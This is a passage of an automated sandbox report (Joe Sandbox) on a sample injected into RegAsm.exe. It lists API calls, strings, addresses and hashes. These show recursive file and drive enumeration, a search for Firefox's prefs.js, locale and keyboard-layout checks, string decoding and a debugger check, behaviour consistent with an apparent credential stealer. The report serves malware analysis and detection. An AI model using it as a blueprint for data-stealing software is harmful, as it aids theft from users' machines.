                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-860711957
                                                    • Opcode ID: 650afc754bf6ffca4ca98e8ae9960d84098b1ab0906beb02fb231cec8e15f4c5
                                                    • Instruction ID: 4cc00a00ce1e0705423cfa8ac4bd8e2619391291ac288f7f79b1abec41bf1520
                                                    • Opcode Fuzzy Hash: 650afc754bf6ffca4ca98e8ae9960d84098b1ab0906beb02fb231cec8e15f4c5
                                                    • Instruction Fuzzy Hash: 3312F4B49047419BE7208F24EE54B9777E4FF49318F14062CE99B8B382E77AF4059B92
                                                    APIs
                                                    • wsprintfA.USER32 ref: 00416D98
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00416DAF
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 00416DDD
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 00416DF3
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00416F36
                                                    • FindClose.KERNEL32(000000FF), ref: 00416F4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                    • String ID: %s\%s
                                                    • API String ID: 180737720-4073750446
                                                    • Opcode ID: e2b85eadb093ec973f3d2cf701caf6266cf0745fef5b918c247462645373d3d4
                                                    • Instruction ID: c786e49f586b1f7bfa14472e80742ecc44eb45db75607d08161972db837cb069
                                                    • Opcode Fuzzy Hash: e2b85eadb093ec973f3d2cf701caf6266cf0745fef5b918c247462645373d3d4
                                                    • Instruction Fuzzy Hash: 25413C7290421CABCF10AFA0DD49EDA77BDBB05304F4444AAB619E2050EB79DAD48F64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
                                                    • API String ID: 0-3496276579
                                                    • Opcode ID: 8c557603c04734963f1c87022e6ccfb9af84bad9395d1d172be97ea96f0fbcc4
                                                    • Instruction ID: 2434a2b30f13b0d97306ad69d76333806308bdcc4522bd39af0286ce0401054b
                                                    • Opcode Fuzzy Hash: 8c557603c04734963f1c87022e6ccfb9af84bad9395d1d172be97ea96f0fbcc4
                                                    • Instruction Fuzzy Hash: 3CC130759007419BC7118F24D8407ABB7F4FF84390F6C092EE89A8A651E73EF559CBA2
                                                    APIs
                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416A5A
                                                    • memset.MSVCRT ref: 00416AB0
                                                    • GetDriveTypeA.KERNEL32(?), ref: 00416ACA
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416AF5
                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00416B1D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Drivelstrcpy$LogicalStringsTypememset
                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$lA
                                                    • API String ID: 3016464087-2583277952
                                                    • Opcode ID: f599dcda9ae328e574b15c0b48bb15f073491a9be348feaa9ea89fd0c42b52f9
                                                    • Instruction ID: d8c264c8c93a54a00a67460d45cdb6232450a29fbc4f44d3c7e660ca34806ed9
                                                    • Opcode Fuzzy Hash: f599dcda9ae328e574b15c0b48bb15f073491a9be348feaa9ea89fd0c42b52f9
                                                    • Instruction Fuzzy Hash: 325140B1910218EBDF20EFB0CC55BED7778BF14309F50405AFA19A61A1DB399A89CF58
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 583e7b278f7505d135c3f3b2da7b4a2d442f5c1c7fe9b66afa3ac58674753625
                                                    • Instruction ID: 850cb209864232a1ec50960ed9e72ca2d8c3918a6b6df00df3541f2844236365
                                                    • Opcode Fuzzy Hash: 583e7b278f7505d135c3f3b2da7b4a2d442f5c1c7fe9b66afa3ac58674753625
                                                    • Instruction Fuzzy Hash: 5A81DF75604301ABE7109F68CD90B6BB3E9FF84714F44083CF9859B240E67EF9928B92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: e
                                                    • API String ID: 0-4024072794
                                                    • Opcode ID: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                    • Instruction ID: b90f639795448d4c6a9ea6702fa58c985157a264aa8721c5067b64af446b025c
                                                    • Opcode Fuzzy Hash: 36bf8875baaf085edaede92fcfbfd96a80b42455c8294c9340591cc07f665f1e
                                                    • Instruction Fuzzy Hash: 9D5113767083419FDB04CE28CC80A7BB7E5FF85212F10456EF8858A561E73AF858C7A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %lld %lld
                                                    • API String ID: 0-3794783949
                                                    • Opcode ID: f9f27324bda0764b89f734ba8e53ddadfc07be361caa7dd9bbe1aa727897de53
                                                    • Instruction ID: b9df12505259d9050ccafd60302d4db0fdeeb177603b4c5cad02fa9070d665d3
                                                    • Opcode Fuzzy Hash: f9f27324bda0764b89f734ba8e53ddadfc07be361caa7dd9bbe1aa727897de53
                                                    • Instruction Fuzzy Hash: BE31C0793043007BE7115B288D85F6B77EEEF80720F504828FA9596252F67EE91287A2
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FB415B1
                                                    • misuse, xrefs: 1FB415AC
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FB415A2
                                                    • API called with NULL prepared statement, xrefs: 1FB41571
                                                    • API called with finalized prepared statement, xrefs: 1FB41586
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-860711957
                                                    • Opcode ID: 56a6d2d744ff1ac0e8d418b929bc9d3e53ca57d7ef571795a1a75e396fd8481e
                                                    • Instruction ID: 6e8100b2c26aedc270f6366182ce82d7a6a768111b8f13b9b64cbaaad0b7e426
                                                    • Opcode Fuzzy Hash: 56a6d2d744ff1ac0e8d418b929bc9d3e53ca57d7ef571795a1a75e396fd8481e
                                                    • Instruction Fuzzy Hash: 3DC1E4B4F047419BE7228F24EE44B9777E4EF40354F24052CE89B9B242E77AF4499792
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FB4D5EC
                                                    • misuse, xrefs: 1FB4D5E7
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FB4D5DD
                                                    • API called with NULL prepared statement, xrefs: 1FB4D5AC
                                                    • API called with finalized prepared statement, xrefs: 1FB4D5C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-860711957
                                                    • Opcode ID: 52f20dfff83a5c9fcd636906d457777492bf07a12516d16ba056680d4d67f301
                                                    • Instruction ID: 320d22b5e2fc4a0f86bc88458931cb9b284f2e9df10404008c02d64dd464d578
                                                    • Opcode Fuzzy Hash: 52f20dfff83a5c9fcd636906d457777492bf07a12516d16ba056680d4d67f301
                                                    • Instruction Fuzzy Hash: 76B1D1B49047019FE7108F24E954B9777E4FF49318F20492CE89A8B341E77AF449DBA2
                                                    APIs
                                                    • wsprintfA.USER32 ref: 0040D6AE
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0040D6C5
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 0040D71B
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0040D731
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DC3C
                                                    • FindClose.KERNEL32(000000FF), ref: 0040DC50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                    • String ID: %s\*.*
                                                    • API String ID: 180737720-1013718255
                                                    • Opcode ID: ef98e4475f349dce152c3307f6babed54af638ba4ea8ac52c64afd0e42f406ea
                                                    • Instruction ID: 442cfaa05b2ab3e60d623e1441183a9edc218a7dbb6c4317de4ad030bb5ceac8
                                                    • Opcode Fuzzy Hash: ef98e4475f349dce152c3307f6babed54af638ba4ea8ac52c64afd0e42f406ea
                                                    • Instruction Fuzzy Hash: 47E104719012189ADB54FB61DC92EEE7378AF15305F4001ABF51AA21E2EF389BC9CF54
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44fdb31c6bcd16521c46d6c3e8f892d7f6f0e33c6a4c5005b50ed2a9a40eda65
                                                    • Instruction ID: 9c21a954c137a937d002614eb21ad8e1807dd75ab7713a51f2ab01f0aa658e84
                                                    • Opcode Fuzzy Hash: 44fdb31c6bcd16521c46d6c3e8f892d7f6f0e33c6a4c5005b50ed2a9a40eda65
                                                    • Instruction Fuzzy Hash: 73F113B06043029FD710AF25DD84A6BBBF9EF81724F04066CFA4586341E77AF955CBA2
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00428F3C,00425200), ref: 0040BD03
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 0040BD4E
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0040BD64
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040BFF5
                                                    • FindClose.KERNEL32(000000FF), ref: 0040C006
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                    • String ID:
                                                    • API String ID: 3334442632-0
                                                    • Opcode ID: c5f616f5eda3dafb28c7c0f1b4bdc6c9cd7d361c0a4f4321f54fe511707648ce
                                                    • Instruction ID: 4555b4d589cef043fd56f714ee56fa9ade97253f9cab423876852d2fa7fbf640
                                                    • Opcode Fuzzy Hash: c5f616f5eda3dafb28c7c0f1b4bdc6c9cd7d361c0a4f4321f54fe511707648ce
                                                    • Instruction Fuzzy Hash: D0914072A001089BCF14FBB1DC56AED737CAB55304F40417AE916D61E1EF399B88CB99
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00428F3C,00425200,?,?), ref: 0040E083
                                                    • StrCmpCA.SHLWAPI(?,00425240,?,?), ref: 0040E0CE
                                                    • StrCmpCA.SHLWAPI(?,0042523C,?,?), ref: 0040E0E4
                                                    • FindNextFileA.KERNEL32(000000FF,?,?,?), ref: 0040E3F8
                                                    • FindClose.KERNEL32(000000FF,?,?), ref: 0040E409
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                    • String ID: prefs.js
                                                    • API String ID: 3334442632-3783873740
                                                    • Opcode ID: e5af86cf9f567a319ea98ade86916d1c05143e646acb64ee6597f74a6a6f4ab9
                                                    • Instruction ID: 7ec953875c6c5f14a54d31713d1439a29a4ceec0943a64869dcacad40cfb8c24
                                                    • Opcode Fuzzy Hash: e5af86cf9f567a319ea98ade86916d1c05143e646acb64ee6597f74a6a6f4ab9
                                                    • Instruction Fuzzy Hash: 15B184319001189BCF24FBB1DC56EEE7378AB51304F5041AAE51AE61E1EE399B84CF98
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8b23fef55ace73a1b622bf770b9bff33798a4cf0250868ffdb8cbc39fc84d7a
                                                    • Instruction ID: d49c94b0cf0cf5a00eaafde21fad9eeffc61931d1d73ede0455de95f72f02847
                                                    • Opcode Fuzzy Hash: f8b23fef55ace73a1b622bf770b9bff33798a4cf0250868ffdb8cbc39fc84d7a
                                                    • Instruction Fuzzy Hash: 32C13476E183414FE7009A28DC81BDB77D1AFD2310F98066EF4D58B292F22DB655CB92
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00425200), ref: 0040C087
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 0040C0D7
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0040C0ED
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C66C
                                                    • FindClose.KERNEL32(000000FF), ref: 0040C67D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                    • String ID: \*.*
                                                    • API String ID: 2325840235-1173974218
                                                    • Opcode ID: 6623af015f500d8acde99b4a15eaf6d4b8a6deb7eac05948cd420457e942a1a4
                                                    • Instruction ID: 7329d939aed49b63b254d5c25295f9d150e90fd7ec20195b4029a03e332fc4c6
                                                    • Opcode Fuzzy Hash: 6623af015f500d8acde99b4a15eaf6d4b8a6deb7eac05948cd420457e942a1a4
                                                    • Instruction Fuzzy Hash: FAF1EC718101189ADB15FB61DCA5EEE7338BF14305F5041EBE21AA21E1EE396BC9CE94
                                                    Strings
                                                    • , xrefs: 1FAC5334
                                                    • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1FAC5264
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                    • API String ID: 0-69911113
                                                    • Opcode ID: 811898fcfffb05ca1521be3bee2424b7d1b7a3293549edf6392e19906e75fabf
                                                    • Instruction ID: 4dee0d1a7aab0aed70cd1450555d930d920c0248312252d5c5929a79810841e3
                                                    • Opcode Fuzzy Hash: 811898fcfffb05ca1521be3bee2424b7d1b7a3293549edf6392e19906e75fabf
                                                    • Instruction Fuzzy Hash: 17418A75A04302AFD700DF29DD80B5AB7E9FF88314F450568F988AB211E77AF951CB92
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                    • Instruction ID: 77b2e9557dff5a9e3e6aae199013ad3de14c26cc9a759ac57f7e78314474a1a1
                                                    • Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
                                                    • Instruction Fuzzy Hash: 6A4192796007429BD7019F29CD80A5BB7F8FF45311F404A28F9688A210E77DF915CBA2
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00425200), ref: 00411D59
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00411D71
                                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00411D83
                                                    • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00411DD3
                                                    • LocalFree.KERNEL32(00000000), ref: 00411E90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                    • String ID: /
                                                    • API String ID: 3090951853-4001269591
                                                    • Opcode ID: 15a7ab0f5f0475079f1a4d254d2fab6afe80d822c98d4419e6fd3bbb7ed8be85
                                                    • Instruction ID: c70b1ae06e32fba280522d5ae6b93e050f7c05b062ce08c862d254046d427c6b
                                                    • Opcode Fuzzy Hash: 15a7ab0f5f0475079f1a4d254d2fab6afe80d822c98d4419e6fd3bbb7ed8be85
                                                    • Instruction Fuzzy Hash: 8C410E7594021CEBDB20EB90DC89BEDB3B8EB14305F2041DAE61AA61A1DB785FC5CF54
                                                    APIs
                                                    • memset.MSVCRT ref: 0040ABB0
                                                    • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,?,?,0040AF23,00000000), ref: 0040ABCC
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,?,0040AF23,00000000), ref: 0040ABD6
                                                    • memcpy.MSVCRT ref: 0040AC63
                                                    • lstrcatA.KERNEL32(?,00425200), ref: 0040AC92
                                                    • lstrcatA.KERNEL32(?,00425200), ref: 0040ACA5
                                                    • lstrcatA.KERNEL32(?,00425200), ref: 0040ACC2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                    • String ID:
                                                    • API String ID: 1498829745-0
                                                    • Opcode ID: 6661e80ca1e7fea63f730de125ff339424fd23340f7e1c57ef70010a67d0dde0
                                                    • Instruction ID: 47d287c87cce67f53112deac9452e79f71b571652ddf1af6d4c21f1cd54e0c8b
                                                    • Opcode Fuzzy Hash: 6661e80ca1e7fea63f730de125ff339424fd23340f7e1c57ef70010a67d0dde0
                                                    • Instruction Fuzzy Hash: F3314671D0421AEFEB109F90DD89BFEBBB9BB04341F6000B6E505B62D0D7745A948F96
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00422C26
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00422C3B
                                                    • UnhandledExceptionFilter.KERNEL32(0042C0CC), ref: 00422C46
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00422C62
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422C69
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID: -HB
                                                    • API String ID: 2579439406-1873209616
                                                    • Opcode ID: 3a26e04cc18f38d93f6d02ad207be3ea59d1494876b4088a994347c29471d8c0
                                                    • Instruction ID: f3fe8569a9c03112045512f37a39921c14f1f4f2f23132fc7f3968e34be72834
                                                    • Opcode Fuzzy Hash: 3a26e04cc18f38d93f6d02ad207be3ea59d1494876b4088a994347c29471d8c0
                                                    • Instruction Fuzzy Hash: A721F6B8611602DFD311DF64FDA56563BB2BB0A310FE0612AF60883270E7F55682CF59
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                    • Instruction ID: 282e7d1bf69f3ff7e894542d0b07ad702e1e83a746ba7e123ce7fc8e7d6ce0b5
                                                    • Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                    • Instruction Fuzzy Hash: 6E4102B6B043029FDB14DF18C884AA6B7F4FF88316F104569E9818B691E76EF854CB60
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7661bdd3e6b7b0ae37f5ff041bae1833c0d643ffc32afbc74a03802bbd1b752a
                                                    • Instruction ID: f99387553132f9f97f59ec1e31da77b4a4460dcd134a672cb74446dec1aa075e
                                                    • Opcode Fuzzy Hash: 7661bdd3e6b7b0ae37f5ff041bae1833c0d643ffc32afbc74a03802bbd1b752a
                                                    • Instruction Fuzzy Hash: F531CF397002009FD350CF28E9C4A66B3E8EF88325B4445ADE9428F262E72AFC51DB50
                                                    Strings
                                                    • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1FAA2001
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                    • API String ID: 0-914542581
                                                    • Opcode ID: d6f2eec27353a0a727dda2c2182153353623e61615af1ae3c7242b945dc9f4de
                                                    • Instruction ID: 022425340ee1333b6dd8a2ec47e8f3a93f2606a563eef4a687a4c8e5ad5e08cf
                                                    • Opcode Fuzzy Hash: d6f2eec27353a0a727dda2c2182153353623e61615af1ae3c7242b945dc9f4de
                                                    • Instruction Fuzzy Hash: EE21BB79600315AFDB11AB68ED80F56B7EEEF44314F004458F94497111E36BF874CBA1
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,1FC13688,?,00000000), ref: 1FC13399
                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,1FC13688,?,00000000), ref: 1FC133C2
                                                    • GetACP.KERNEL32(?,?,1FC13688,?,00000000), ref: 1FC133D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 5511586d90d8fe012ecb3eca295cd8d88011c0645e8c68e32a4ee2aaf7f2b013
                                                    • Instruction ID: 180f98299ccf9c276a6223f3220067a0ed9f9a23244a11bb142b5e9202c36e8a
                                                    • Opcode Fuzzy Hash: 5511586d90d8fe012ecb3eca295cd8d88011c0645e8c68e32a4ee2aaf7f2b013
                                                    • Instruction Fuzzy Hash: 4F215133708202E7D7158F66C905A8A72A6AFC0E68BC64554E90DDF204EF32E962F358
                                                    APIs
                                                    • GetUserDefaultLCID.KERNEL32 ref: 1FC1365A
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 1FC13698
                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 1FC136AB
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 1FC136F3
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 1FC1370E
                                                    Memory Dump Source
